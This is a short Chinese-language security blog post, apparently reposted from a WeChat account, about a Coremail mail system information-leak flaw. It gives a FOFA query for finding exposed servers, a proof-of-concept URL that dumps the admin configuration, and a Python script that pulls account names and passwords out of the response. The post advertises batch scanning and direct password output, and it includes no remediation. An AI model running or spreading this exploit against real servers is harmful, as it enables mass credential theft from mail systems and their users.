CoreMail信息泄露

  • A+
所属分类:安全文章

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!

FOFA语法:

app="Coremail-邮件系统"


POC:

url/mailsms/s?func=ADMIN:appState&dumpConfig=/


利用脚本代码:

def poc(url):  target = url+"/mailsms/s?func=ADMIN:appState&dumpConfig=/"  r = requests.get(url=target,verify=False,timeout=8)  print('-'*50)  if r.status_code==200 and "S_OK" in r.text:    print(url+"    "+"漏洞存在!")    a = str(r.text)    match = re.findall(r'<string name="Password">(.*?)</string>',a,re.I|re.M)    match1 = re.findall(r'<string name="User">(.*?)</string>',a,re.I|re.M)    if match1:      print("账号为:"+match1[1])    else:      print("账号未找到")    if match:      print("密码为:"+match[6])    else:      print("密码未找到")  else:    print(url+"    "+"漏洞不存在!")

需要脚本请直接在公众号回复联系作者:CoreMail

支持批量扫描,支持直接输出账号密码

CoreMail信息泄露


本文始发于微信公众号(Fight Tigers Team):CoreMail信息泄露

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: